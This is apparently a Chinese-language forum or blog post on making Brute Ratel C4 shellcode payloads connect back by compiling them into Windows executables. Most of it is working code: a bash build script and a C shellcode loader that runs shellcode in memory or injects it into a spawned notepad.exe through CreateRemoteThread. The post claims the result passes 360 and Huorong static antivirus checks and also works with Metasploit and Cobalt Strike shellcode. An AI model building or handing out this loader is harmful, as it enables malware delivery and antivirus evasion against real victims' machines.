brc4 1.2.2生成exe无法回连解决方法
将生成的bin文件转换为exe即可
贴码
bincompiler.sh
#!/bin/bash
if [ $# -lt 3 ]; then
echo "需要提供 shellcode 二进制文件进行编译。例如: binCompiler.sh 86/64 <shellcode.bin> <output.exe>"
else
if [ ! -f "$2" ]; then
echo "路径不存在: $2"
else
cp "$2" shellcode.bin -rf
xxd -i shellcode.bin > shellcode.h
if [ "$1" = "86" ]; then
echo "正在编译 x86"
i686-w64-mingw32-gcc runshellcode.c -o "$3" -lws2_32
else
echo "正在编译 x64"
x86_64-w64-mingw32-gcc runshellcode.c -o "$3" -lws2_32
fi
echo "+ 成功"
rm -rf shellcode.bin shellcode.h
fi
fi
runshellcode.c
#include <windows.h>
#include <stdio.h>
#include <winternl.h>
#include "shellcode.h"
int main(int argc, char* argv[]) {
if (argc == 1) {
DWORD lpThreadId = 0;
DWORD flOldProtect = 0;
LPVOID addressPointer = VirtualAlloc(NULL, sizeof(shellcode_bin), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
memcpy(addressPointer, shellcode_bin, shellcode_bin_len);
VirtualProtect(addressPointer, shellcode_bin_len, PAGE_EXECUTE_READ, &flOldProtect);
((void(*)())addressPointer)();
WaitForSingleObject((HANDLE)-1, -1);
} else {
STARTUPINFOA sinfo = {0};
sinfo.cb = sizeof(sinfo);
PROCESS_INFORMATION pinfo = {0};
if (CreateProcessA(NULL, "notepad.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo)) {
LPVOID addressPointer = VirtualAllocEx(pinfo.hProcess, NULL, sizeof(shellcode_bin), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(pinfo.hProcess, addressPointer, shellcode_bin, shellcode_bin_len, 0);
printf("pid: %lu\n", pinfo.dwProcessId);
printf("Allocated: %p\n", addressPointer);
DWORD tID = 0;
DWORD flOldProtect = 0;
VirtualProtectEx(pinfo.hProcess, addressPointer, shellcode_bin_len, PAGE_EXECUTE_READ, &flOldProtect);
getchar();
CreateRemoteThread(pinfo.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)addressPointer, NULL, 0, &tID);
printf("tID: %lu\n", tID);
}
}
return 0;
}
使用方法:将两个文件放在同一个文件夹下
binCompiler.sh 86/64 <shellcode.bin> <output.exe>
实际效果:生成的exe可以过360和火绒静态检测,过不了360动态检测,可以正常上线
当然了,通过msf或者cobaltstricke生成的bin文件也可以使用该方法进行转换,但是要注意系统位数。
注意:需要安装xxd